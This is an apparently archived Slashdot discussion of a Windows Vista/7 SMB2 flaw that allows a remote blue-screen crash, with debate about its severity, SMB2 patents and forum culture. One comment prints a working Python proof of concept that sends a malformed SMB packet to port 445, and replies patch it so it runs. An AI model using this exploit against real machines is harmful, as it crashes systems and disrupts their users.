Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Windows 7 Reintroduces Remote BSoD

timothy posted about 5 years ago | from the no-such-thing-as-perfect-security dept.

Microsoft 427

David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."

cancel ×

427 comments

Sorry! There are no comments related to the filter you selected.

Local? (5, Interesting)

MindStalker (22827) | about 5 years ago | (#29350609)

If it relies on a SMB2 request it is most likely restricted form request inside the LAN.
Either way, still bad.

Re:Local? (3, Interesting)

fuzzyfuzzyfungus (1223518) | about 5 years ago | (#29350669)

Especially unpleasant given that SMB2 is pretty common on important shared resources. Like fileservers.

Crashing clients is bad, any client on the LAN being able to take down the fileserver is substantially worse.

Re:Local? (4, Interesting)

afidel (530433) | about 5 years ago | (#29350801)

Actually the headline is very misleading and that's bad. This affects SMB2 which is in Vista and Server 2008 as well, that means every Server 2008 system is likely vulnerable to a LAN based DoS attack.

"RE"-introducing? (4, Interesting)

WED Fan (911325) | about 5 years ago | (#29351299)

The article makes it seem like it hasn't been in Windows since Windows NT and that Windows 7 is the first time it's reappeared. Seriously, Vista has it.

Is this a case of "It's after midnight, must post another slam on Microsoft, even if we have twist and stretch like taffy to make the case"?

It wouldn't be so bad but the body of the submission is incredibly slanted, almost more than some of the replies.

Re:Local? (3, Funny)

GameMaster (148118) | about 5 years ago | (#29351301)

Of course, the proper remedy for this (given that it is on a LAN) is to get up, walk down the hall, and beat the crap out of the douche-bag who's DoSing you. Really, the only reason DoS attacks work so well on the Internet is that the guys doing it are probably half-way around the world.

Re:Local? (2, Insightful)

PsychicX (866028) | about 5 years ago | (#29350685)

Agreed -- it IS rather bad, but generally speaking you're not expecting attacks from inside your LAN. As Windows vulnerabilities go, this isn't horrible in a practical sense.

Re:Local? (3, Insightful)

ZekoMal (1404259) | about 5 years ago | (#29350711)

Not expecting such a problem until you go to college; half of the students on my campus don't even have a password put on their computers, making it extremely easy to access them remotely as is. If everyone had Win 7 installed, well...it'd make for some interesting work.

Re:Local? (4, Interesting)

Sethb (9355) | about 5 years ago | (#29351121)

Uh, by default on modern incarnations of Windows, accounts without passwords are *not* allowed to log in remotely. So, they're extremely difficult to access remotely.

Re:Local? (1)

PC and Sony Fanboy (1248258) | about 5 years ago | (#29351147)

... except that 99.99% of students don't have anything worth stealing on their computers.

Other than movies/music/credit card info, of course.

Re:Local? (3, Funny)

Anonymous Coward | about 5 years ago | (#29351207)

Digital cameras make for plenty of things worth finding.

Re:Local? (1)

tagno25 (1518033) | about 5 years ago | (#29350793)

As Windows vulnerabilities go, this isn't horrible in a practical sense.

Unless this works with IPv6.

If it works with IPv6 then a malicious site can have IPv6 address. When the user visits the site the code reads the source IP and implements the attack.

Re:Local? (0)

Anonymous Coward | about 5 years ago | (#29350845)

...what?

Re:Local? (3, Insightful)

gazbo (517111) | about 5 years ago | (#29350881)

Just because IPv6 reduces the need for NAT doesn't mean you shouldn't use a firewall. I assume that's what you were talking about anyway.

Re:Local? (3, Insightful)

dontclapthrowmoney (1534613) | about 5 years ago | (#29351003)

...generally speaking you're not expecting attacks from inside your LAN...

Even if you have total control over all physical access points to your LAN, and total trust in your user base, there is still a chance that internal people can try to do nasty things - and in some ways they may have more motivation to do so.

I think the concept of "internal/trusted network" is going to shrink - nowadays I tend to this of the "internal network" as ending at the edge of centralised server resources, and clients on what would have been called the "internal LAN" are actually outside of what I would now call the "trusted zone". Even then, SMB traffic is more likely to be open so this vulnerability is still a problem, and many organisations still concentrate on border protection without taking any defense-in-depth measures internally so they're probably wide-open to this.

I could be paranoid, but I don't want to be less strict with internal controls and then find out the hard way that I was right all along.

Re:Local? (1)

postbigbang (761081) | about 5 years ago | (#29351303)

There is no such thing as total trust. Bots aren't trustworthy, and there are millions of machines that have them handily installed.

Oops.

Re:Local? (1)

asdf7890 (1518587) | about 5 years ago | (#29351113)

On its own is isn't massively scary, but if the exploit can be triggered by a non-privileged user then it could be used in conjunction with many other types of attack to create a DoS. If someone (or some automated malicious code) exploits a hole in your public facing mail/web/what-ever server to gain access to run arbitrary code then they could DoS any machines not shielded from the hacked machine (which may only be that machine itself, but that is still one machine that can be taken offline). There is also the disgruntled employee to consider, and in any large organization there is usually at least one of them. If the DoS vector is not easily tracked back to the source then they can take down a bunch of machines just to cause hassle and unless they take down every machine that can access except their own you may have a hard time finding clues.

Re:Local? (5, Funny)

GameMaster (148118) | about 5 years ago | (#29351271)

NOBODY EXPECT ATTACKS FROM INSIDE YOUR LAN!!!! Their chief weapon is surprise...surprise and fear...fear and surprise.... Their two weapons are fear and surprise...and ruthless efficiency.... Their *three* weapons are fear, surprise, and ruthless efficiency...and an almost fanatical devotion to rms.... Their *four*...no... *Amongst* their weapons.... Amongst their weaponry...are such elements as fear, surprise.... I'll come in again.

Not even local? (0)

Anonymous Coward | about 5 years ago | (#29350891)

Windows 7 enables firewall by default, so wouldn't it practically stop this anyways for ordinary clients?

Re:Local? (1, Informative)

jim_v2000 (818799) | about 5 years ago | (#29350929)

Pft...it'll be patched whenever the next update cycle is and will be irrelevant. Yeah, it's bad, but it will be short lived.

Re:Local? (5, Funny)

poetmatt (793785) | about 5 years ago | (#29351231)

well, now I know how to win any lan party contests :)

Re:Local? (0)

Anonymous Coward | about 5 years ago | (#29351403)

how to win any lan party contests

Have Leeroy Jenkins on your team?

Woo! (-1, Troll)

ZekoMal (1404259) | about 5 years ago | (#29350617)

I love it when Microsoft self-sabotages. Windows 7 was already being called "Vista: Fixed"; now it's introducing fun new ways for "Vista" to fail. But let's be fair to Microsoft; they don't like introducing "new" things, so in tune with this philosophy, they're merely re-releasing an old problem and packaging it differently ;)

IP Reasons for SMB2 (4, Interesting)

eldavojohn (898314) | about 5 years ago | (#29350755)

they don't like introducing "new" things

A slight correction, they like to introduce new things when it suits them. Why the rewrite of SMB into SMB2? Well, it has some technological advantages you would expect but according to Wikipedia [wikipedia.org] :

SMB 2 has two big benefits to Microsoft. The first is clear intellectual property ownership. SMB 1 was originally designed by IBM and was shipped on a wide variety of non-Windows operating systems such as SCO Xenix, OS/2 and DEC VMS (Pathworks). It was partially standardised by X/Open and also had draft standards for IETF which lapsed. (See http://ubiqx.org/cifs/Intro.html [ubiqx.org] for historical detail).

The second benefit is a clean break. Microsoft's SMB1 code has to work with a huge variety of SMB clients and servers. A large number of items in the protocol are optional (such as short and long filenames), there are many infolevels for commands (selecting what structure is returned to a particular request), Unicode was a later addition etc. With SMB2 there is significantly reduced compatibility testing (currently only other Windows Vista clients and servers). Additionally the code is a lot less complex since there is far less variability (e.g. there is no need to worry about having Unicode and non-Unicode code paths as SMB2 requires Unicode support).

So you can see they like to introduce new things when it means they have clear intellectual property ownership rights over it and also a lot less work for them. They also don't have to be backwards compatible with their own products.

While SAMBA 4.0 has experimental support for SMB2 interfacing [samba.org] , I'm guessing the "clear intellectual property" could spell trouble moving forward for Tridgell and the SAMBA team.

Re:IP Reasons for SMB2 (2, Informative)

AndrewNeo (979708) | about 5 years ago | (#29350923)

No, it won't. The specs are right here [microsoft.com] .

Re:IP Reasons for SMB2 (3, Informative)

leromarinvit (1462031) | about 5 years ago | (#29351055)

Probably not technical problems, but maybe legal ones. See that paragraph about patents? Neither the Open Specification Promis nor the Community Promise (both linked) cover SMB2.

Re:IP Reasons for SMB2 (4, Informative)

eldavojohn (898314) | about 5 years ago | (#29351097)

No, it won't. The specs are right here [microsoft.com] .

"No, it won't" what? Possibly spell problems for the Samba team? From your link:

Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp [microsoft.com] ) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx [microsoft.com] ). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com ...

Emphasis mine. So I'll correct myself, it may spell trouble for the Samba team. It's not clear. Which is essentially what I said. Do you really think iplg@microsoft.com will grant the Samba team a written license or possibly a patent license?

Why do they use the ambiguous language quoted above if this is an open technology I'm not suppose to fear implementing? I mean, haven't we been threatened over this sort of thing before [slashdot.org] ? It's not clear to me why Microsoft stops other products from interfacing with theirs (product lock in?) but I'm not about to give them the benefit of the doubt.

Re:IP Reasons for SMB2 (2, Insightful)

BassMan449 (1356143) | about 5 years ago | (#29351291)

Did you read the link?

Patents. Microsoft has patents that may cover your implementations of the technologies described in the Open Specifications. Neither this notice nor Microsoft's delivery of the documentation grants any licenses under those or any other Microsoft patents. However, a given Open Specification may be covered by Microsoft's Open Specification Promise (available here: http://www.microsoft.com/interop/osp [microsoft.com] ) or the Community Promise (available here: http://www.microsoft.com/interop/cp/default.mspx [microsoft.com] ). If you would prefer a written license, or if the technologies described in the Open Specifications are not covered by the Open Specifications Promise or Community Promise, as applicable, patent licenses are available by contacting iplg@microsoft.com..

I checked both the Open Specification Promise and the Community Promise and SMB2 is not covered by either. Just because Microsoft published the spec doesn't mean they won't sue you for patent infringment.

Re:IP Reasons for SMB2 (1)

agnosticnixie (1481609) | about 5 years ago | (#29351305)

How much can we bet that it's to use as a justification if somebody tries to use "clean room implementation" as a defense like could be done with Samba?

Re:Woo! (2, Informative)

Sethb (9355) | about 5 years ago | (#29351187)

I love it when Slashdot can't post an accurate headline. This is a flaw in SMB 2.0, which is present in Windows Vista, Windows Server 2008, Windows 7, and probably Windows Server 2008 R2 as well. This is not new to 7, it's a common flaw in all the implementations of SMB 2.0. XP isn't affected because XP can't speak that protocol.

First Post (-1, Offtopic)

goldmaneye (1374027) | about 5 years ago | (#29350619)

Heated debate begins in three ... two ... one ...

Re:First Post (0, Offtopic)

Yamata no Orochi (1626135) | about 5 years ago | (#29350645)

Aren't "First!" posts generally frowned upon?

And you weren't even the first post.

Re:First Post (0, Offtopic)

ZekoMal (1404259) | about 5 years ago | (#29350689)

What's the second most popular post to make...oh yes:

You must be new here.

Re:First Post (1, Insightful)

commodore64_love (1445365) | about 5 years ago | (#29350727)

"Commodore Amiga is better!"
"No Atari ST is better!"
"No Amiga!"
"No Atari!"
"Amiga!"
"Atari!"

Oh that's not the debate you were looking for? Sorry. Let me update that ancient debate for the modern world:
"Apple Macintosh is better!"
"No Microsoft PC is better!"
"No Apple!"
"No Microsoft!"
"Apple!"
"Microsoft!"

(and ancient debate... just as juvenile today as it was 20 years ago)

Re:First Post (4, Funny)

Rik Sweeney (471717) | about 5 years ago | (#29350783)

Let me Loony Tunes that up for you:

Wabbit Season!
Duck Season!

Wabbit Season!
Duck Season!

Re:First Post (3, Funny)

Anonymous Coward | about 5 years ago | (#29351127)

Or to be more apt (for slashdot)... some people prefer Ford, some prefer Dodge, others still prefer Toyota. Gas is better for some applications, while Diesel is better for others, while electric is better for others.

When a new car line comes out, new defects are to be expected on occasion. Sometimes there are even defects present that were fixed in previous models.

Re:First Post (0)

Anonymous Coward | about 5 years ago | (#29351337)

So, which is the one who falls for the Bugs Bunny Argument Reversal trick?

M$Borg: Microsoft!
MacBoi: Apple!

M$Borg: Microsoft!
MacBoi: Apple!

M$Borg: Microsoft!
MacBoi: *slight pause*

MacBoi: Microsoft!
M$Borg: Apple!

MacBoi: Microsoft!
M$Borg: Apple!

MacBoi: Okay, you win. Apple.
M$Borg: Wait... what?

Re:First Post (0)

Anonymous Coward | about 5 years ago | (#29350855)

Apple was better then too.

Re:First Post (0)

Anonymous Coward | about 5 years ago | (#29351053)

Hardly

eat my shorts slashdot !! (-1, Offtopic)

Anonymous Coward | about 5 years ago | (#29350621)

And teardrop that !!

Big wow (0)

Anonymous Coward | about 5 years ago | (#29350627)

You could also do the same to some Linux builds in the good old days. Im sure this will be fixed soon

Re:Big wow (4, Funny)

mdm-adph (1030332) | about 5 years ago | (#29350673)

Yeah, we read the first three lines of the Wikipedia link, too.

Re:Big wow (3, Funny)

Anonymous Coward | about 5 years ago | (#29351067)

No we didn't. Shut up.

The difference is... (2, Interesting)

Xest (935314) | about 5 years ago | (#29350647)

...half the world is behind a NAT setup now, and the other half has Windows firewall enabled. Windows update exists now so people will be able to patch quickly and easily when a patch arrives.

Realistically this isn't going to effect many people like the old exploit did.

Still, it's quite comical, maybe this is Microsoft's take on the saying "The old ones are the best". So much for their secure development practices, there's really no excuse for them not picking this one up before release.

Re:The difference is... (4, Insightful)

rastilin (752802) | about 5 years ago | (#29350873)

Rewritten software is a double-edged sword. On the one hand you are able to finally discard the truly broken sections of your previous implementation; allowing you to make massive leaps forward. On the other you're getting rid of a large list of known bugs and replacing it with an even larger list of unknown ones.

One of the most useful features of old technolgy is that it breaks in predictable ways.

So it's not too surprising that something like this happened. Doesn't worry me either, I have firewalls and a NAT on all my machines, no reason not to. However since it's something that happened before, it's irritating that Microsoft didn't think to check for something like this.

Re:The difference is... (1)

RebelWebmaster (628941) | about 5 years ago | (#29351335)

One would hope that they'd have a suite of unit tests that would catch something like this, though.

Re:The difference is... (4, Insightful)

Sfing_ter (99478) | about 5 years ago | (#29350897)

really - unless the person sets the "Let Microsoft decide when and where I do updates" most of the updates WILL NOT be done. The average person uses the computer like a tv - turn it on to see the web and turn it off when done. Leave my computer on ALL NIGHT just so i can backup/run antivirus/run defrag/run etc. etc. ???

Oh yeah these people do exist and they have 'FRIENDS' that 'KNOW' computers and 'HELP' them out by turning off that annoying UAC or giving them a 'FREE' version of office. The looks on their faces when I explain that the software they got off Limewire is infected with virus' - they can't believe microsoft would do that!!! THAT is the mentality, and that is why these attacks have always worked, and will always work.

Re:The difference is... (1)

dvh.tosomja (1235032) | about 5 years ago | (#29350903)

> half the world is behind a NAT setup now

So the blackhats will be from the other half right?

Not a problem. (4, Funny)

onion2k (203094) | about 5 years ago | (#29350653)

It's incredibly unlikely to ever affect anyo

looks like ill (1)

nimbius (983462) | about 5 years ago | (#29350665)

need to rebind a key in fluxbox and dig out my "spank" keycap from 2003....this exploit was pretty effective though, being the modern day equivalent of a highway driver with a tow missile.

I knew Windows 7 was too good to be true (5, Funny)

commodore64_love (1445365) | about 5 years ago | (#29350667)

- Shiny-new interface.
- No annoying "are you sure" popups every 30 seconds like Vista.
- Can run on a 1 gigabyte machine without slowing to a crawl.

It simply wasn't possible for Microsoft to make such a great perfect OS without including a flaw.

Re:I knew Windows 7 was too good to be true (0)

Anonymous Coward | about 5 years ago | (#29350859)

Mods on crack! That's not flamebait, that's fucking hilarious.

Re:I knew Windows 7 was too good to be true (0, Flamebait)

Anonymous Codger (96717) | about 5 years ago | (#29350937)

Shouldn't be modded Flamebait, humorless moderator.

It may be apocryphal, but I have read that Islamic makers of elaborate rugs always include a flaw somewhere in the design. Supposedly, attempting to create something perfect would be an affront to Allah, who is the only being who is perfect and who can create perfection. Maybe Balmer comes from a long line of Persian rug merchants.

Re:I knew Windows 7 was too good to be true (0, Offtopic)

Anonymous Coward | about 5 years ago | (#29351191)

If Allah feels threatened by a stupid rug that makes him a pretty lame deity IMO.

Pretty nice (1)

FlyingBishop (1293238) | about 5 years ago | (#29350679)

Although I don't think Windows 7's feature list is stable yet, and I expect to see this one pulled before the release.

Pity.

Re:Pretty nice (2, Informative)

David Gerard (12369) | about 5 years ago | (#29350725)

This is in the RTM gold master.

Just one word... (0, Troll)

quatin (1589389) | about 5 years ago | (#29350697)

lollerskates

Not consistent (5, Interesting)

james_a_craig (798098) | about 5 years ago | (#29350713)

Having actually tried this on three windows 7 machines now, it doesn't seem to work on every machine. (Actually, it's yet to work on any here, although I hear tell that it does work on some). There's something more to this than just "that data crashes it every time".

Re:Not consistent (4, Funny)

DoofusOfDeath (636671) | about 5 years ago | (#29350977)

Having actually tried this on three windows 7 machines now, ...

You must be popular with your coworkers.

Re:Not consistent (5, Informative)

Lulfas (1140109) | about 5 years ago | (#29351219)

It's because SMB and SMBv2 are firewalled straight out of the box. You have to turn on homegroup and then attempt to exploit. Not quite the "OMG SKY IS FALLING" that the summary leads us to believe.

Re:Not consistent (0)

Anonymous Coward | about 5 years ago | (#29351227)

Works on Vista as well.

Correction! (5, Informative)

David Gerard (12369) | about 5 years ago | (#29350741)

I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.

And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.

Re:Correction! (4, Informative)

Anonymous Coward | about 5 years ago | (#29350811)

And not exploitable out of the box since SMB and SMBv2 are both firewalled. Yes, if you turn on homegroup, you are opening SMBv2 through the firewall, but only for the private network - so the exploit would need to be coming from another machine at your house. All in all, a nasty issue but won't really affect that many people.

SMB is firewalled ? (1)

viralMeme (1461143) | about 5 years ago | (#29350911)

"And not exploitable out of the box since SMB and SMBv2 are both firewalled"

What do you mean, is this firewall the software one built into Vista or an external one. If so thn it's relying on the same TCP/IP stack to protect it.

Re:SMB is firewalled ? (1)

RalphSleigh (899929) | about 5 years ago | (#29351077)

My understanding is this a protocol based, rather than TCP attack (the proof uses a normal python socket to send some data), so if the firewall eats the packet instead of letting the SMB service get it, the PC will be fine.

Re:SMB is firewalled ? (1)

VGPowerlord (621254) | about 5 years ago | (#29351395)

"And not exploitable out of the box since SMB and SMBv2 are both firewalled"

What do you mean, is this firewall the software one built into Vista or an external one. If so thn it's relying on the same TCP/IP stack to protect it.

Yes, but SMB2 is a higher level protocol than TCP or IP. In network stacks, received packets are processed from the bottom up.

In OSI terms, received packets are processed like this: physical, data link, network, transport, session, presentation, application. TCP and IP live at the middle layers (3 and 4). SMB lives in the upper layers (5-7).

Ahh, nice to see ... (5, Funny)

UncHellMatt (790153) | about 5 years ago | (#29350745)

...that my fellow Boston Public School graduates are writing for seclists.org.

Section V: "An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. "

Yes, because we been done had seen that explot in the pasts.

Dear $DEITY, are there no proof readers or editors alive on these sites?

I'll be suprised if this affects anyone. (3, Interesting)

jim_v2000 (818799) | about 5 years ago | (#29350865)

IT departments are going to keep everything patched, and individuals aren't going to do it to themselves on their LANS. Between firewalls and NATs, it's not going to happen over the internet. Really, the only situation that I can imagine this happening is perhaps on a university network.

Re:I'll be suprised if this affects anyone. (1)

jgtg32a (1173373) | about 5 years ago | (#29350913)

Or maybe they won't patch this and use it to punish annoying users

Re:I'll be suprised if this affects anyone. (1)

Psx29 (538840) | about 5 years ago | (#29351041)

What about open WiFi networks in public places?

Re:I'll be suprised if this affects anyone. (1)

Krneki (1192201) | about 5 years ago | (#29351253)

The same as using WAN/LAN connection without a firewall.

Happy BSOD day. :)

Re:I'll be suprised if this affects anyone. (1)

leromarinvit (1462031) | about 5 years ago | (#29351131)

Really, the only situation that I can imagine this happening is perhaps on a university network.

Nah, those communist hippie students all use Linux anyway.

Disclaimer: I'm a student and I use Linux. :-)

Re:I'll be suprised if this affects anyone. (1)

Krneki (1192201) | about 5 years ago | (#29351235)

Of course, impossible scenario.

Infect one PC inside the network and let the new virus BSOD everything inside the LAN.

Re:I'll be suprised if this affects anyone. (1)

Rich0 (548339) | about 5 years ago | (#29351321)

Yup - this could never impact anybody.

Why, the ports used to trigger this exploit are like the DCOM RPC ports and MS-SQL ports - nobody allows those to be accessed over the internet which is why we've never had any large-scale worms take advantage of them...

Please grow up, you're driving us away (5, Insightful)

Anonymous Coward | about 5 years ago | (#29350901)

Hi. I'm an adult. I work as a software engineer.

I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.

I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.

If you want to attract intelligent, grown-up people to Linux you need to stop doing certain things.

1) Don't act as if users of other operating systems are less intelligent than you. It turns out that Linux-advocacy isn't the entire world, and that leaders in different fields (or even this one!) might be using Windows. They're not "lusers", they just have priorities different from your own.

2) Don't act as if Linux hasn't had equally stupid stuff happen to it. Yes, it's a different process altogether, and I would dare say that bugs are less likely due to its open source nature, but they still happen. One that I can remember off the top of my head is Debian's guessable SSL keys.

3) Try—for ten minutes—to give the impression that half of your time isn't devoted to bashing an OS you believe is irrelevant.

4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.

Re:Please grow up, you're driving us away (0)

Anonymous Coward | about 5 years ago | (#29351031)

If I had mod points or knew how they worked I'd mod you up.

Except I actually quite like xkcd. but appart from that...

Re:Please grow up, you're driving us away (0)

Anonymous Coward | about 5 years ago | (#29351039)

Also, try to be *accurate*. The linked bulletin CLEARLY states this bug was (re)introduced in Vista. This entry is just another in a long line of Windows 7 bashing circle-jerks. Slashdot has really taken a dive in recent years.

Pro-tip 1: fire kdawson.
Pro-tip 2: kill Idle.

Re:Please grow up, you're driving us away (5, Insightful)

Anonymous Coward | about 5 years ago | (#29351043)

The pubertal masses of Slashdot != The Linux community

Re:Please grow up, you're driving us away (1)

nschubach (922175) | about 5 years ago | (#29351401)

Precisely, that's like saying that the Orthodox Church fully represents all religions.

Re:Please grow up, you're driving us away (1, Funny)

Anonymous Coward | about 5 years ago | (#29351107)

Dammit Dad, you're such a buzzkill.

Re:Please grow up, you're driving us away (1)

Mornedhel (961946) | about 5 years ago | (#29351115)

Hi. I'm an adult. I work as a software engineer.

[cut a lot of things I happen to agree with]

4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.

I agree that old memes just copypasted onto anything can be tiring. But half the fun in reading Slashdot is seeing Slashdot memes cleverly reinvented (a Russian reversal is still funny if it applies). I don't want to see the memes go away.

Also, with my current threshold settings, I can see only one meme (of the "$%*ÂNO CARRIER" kind) and no stupid bashing or "Microsh*t". You may be overreacting.

Re:Please grow up, you're driving us away (0)

Anonymous Coward | about 5 years ago | (#29351137)

Oh ya, and
5) Get Off My Lawn!

Re:Please grow up, you're driving us away (-1)

commodore64_love (1445365) | about 5 years ago | (#29351199)

>>> I cannot join in with the Linux community because of you people..... [stop] acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs.
>>>

Yes and those bugs affect both Windoze and Linux. But then there's Mac OS 10.6 which is pretty-much flawless, so really there's no excuse for Microsoft not to be just as capable as Apple when it comes to producing a bug-free OS.

Re:Please grow up, you're driving us away (2, Insightful)

bflong (107195) | about 5 years ago | (#29351211)

You're in the wrong place. You won't find a high percentage of adult, intelligent people here, and those that are are not very vocal. Maybe a long, long time ago, but no more. As someone else already said Slashdot != Linux Community.

Re:Please grow up, you're driving us away (2, Informative)

Anonymous Coward | about 5 years ago | (#29351229)

Yes, use Windows because none of that ever happens. [electronista.com]

Great strawman argument, btw. We should ignore vulnerabilities in microsoft software because some precious flowers don't want their sensibilities offended.

Re:Please grow up, you're driving us away (0)

Anonymous Coward | about 5 years ago | (#29351247)

He said nerdsnort.

Re:Please grow up, you're driving us away (1, Insightful)

Anonymous Coward | about 5 years ago | (#29351279)

Dear Anonymous Coward,

Please do not lump all Linux users under the same tree. Most of us that has reached past our first 20-or-so years have gone past the Microsoft hate and like Linux for what it is, not because we dislike MS or Windows. Forgive our immature teenage hacker boys, they've yet to grow up, get a life and get a girlfriend.

Sincerely,
A Linux User

Re:Please grow up, you're driving us away (3, Informative)

Krneki (1192201) | about 5 years ago | (#29351287)

Trolls are OS independent. :)

and its ironic (-1, Flamebait)

circletimessquare (444983) | about 5 years ago | (#29351331)

how these same people will go on to bash the stupidity of religion in another thread, or the idiocy of braindead partisan politics, when they are nothing more than religious zealots and mindless partisans themselves in their thinking, on other topics

Re:Please grow up, you're driving us away (1, Informative)

Anonymous Coward | about 5 years ago | (#29351363)

Dear User. It's a shame you cannot join linux community. We will be missing you and your valuable posts including:

1) Your thoughts on what should be fixed in 'linux'

2) Numerous (yet not very useful) descriptions of problems you encountered with 'linux' and demands to fix them

3) Comparing 'linux' to windows every time a new ubuntu or windows release is out

4) Screenshots of your desktop & stories about your friends seeing you use 'linux'

Re:Please grow up, you're driving us away (0)

Anonymous Coward | about 5 years ago | (#29351381)

Hi. I'm an adult. I work as a software engineer.

You are a scrub. That is all.

Re:Please grow up, you're driving us away (1, Funny)

Anonymous Coward | about 5 years ago | (#29351389)

Don't act as if users of other operating systems are less intelligent than you

Everyone knows using linux makes you smarter. If any, it'l learn you how to use google. Better even: it'l learn you how to use google without a graphics or network adapter working on your box.

(if you think this is a flame, think twice.)

Re:Please grow up, you're driving us away (1, Insightful)

JasterBobaMereel (1102861) | about 5 years ago | (#29351397)

Slashdot is not the Linux Community

1) People who use windows are not stupid, they either like it, prefer it, are unaware of alternatives, or are forced to .... people who constant claim it is the most wonderful thing and flawless however consider stupid .... just like mindless Linux advocates

2) Yes this has happened in Linux, but as you pointed out Windows is a mainstream commercial product and has, I assume, a whole department paid to do regression testing, checking for likely flaws, checking and rechecking.... and this slipped through

3) Slashdot is not the Linux Community

4) Slashdot is not the Linux Community

Re:Please grow up, you're driving us away (0, Troll)

tdobson (1391501) | about 5 years ago | (#29351405)

You must be new here.

For all who want a more technical summary of TFA: (5, Informative)

Seth Kriticos (1227934) | about 5 years ago | (#29350917)

Vulnerable systems are all with SMB2 drivers: Vista, W7 and probably Server 2008

The exploit (which is actually ridiculously simple) goes as follows:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Current problem solution: disable the SMB protocol on your infrastructure..

Now please excuse me, I have go and play a bit with our network admin.. /joke

Re:For all who want a more technical summary of TF (0)

Anonymous Coward | about 5 years ago | (#29350993)

I needed to change a few things to get it to work for me.

I added "import socket" and changed "socket()" to "socket.socket(socket.AF_INET, socket.SOCK_STREAM)"

Re:For all who want a more technical summary of TF (0)

Anonymous Coward | about 5 years ago | (#29351159)

--- Smb-Bsod2.py 2009-09-08 09:35:58.000000000 -0500
+++ Smb-Bsod.py 2009-09-08 09:22:12.000000000 -0500
@@ -1,6 +1,7 @@
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
+import socket
from time import sleep

host = "IP_ADDR", 445
@@ -22,7 +23,7 @@
"\x30\x30\x32\x00"

)
-s = socket()
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.send(buff)

Well done, guys! (-1, Flamebait)

Anonymous Coward | about 5 years ago | (#29351073)

Another one for the Slashdot Bias Game.

The Drinking game.... (1)

NoYob (1630681) | about 5 years ago | (#29351111)

Don't play it using hard liquor!

Ooohhhhh, my head.

doesn't seem to work (0)

Anonymous Coward | about 5 years ago | (#29351325)

My sample size of "one" is obviously not conclusive, but I just tested this on Win 7 Enterprise.

To my disappointment, the Win7 box didn't BSOD.

Samba and SMB2 (1)

Zombie Ryushu (803103) | about 5 years ago | (#29351351)

Let us hope Samba does not replicate this with its SMB2 Server.

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?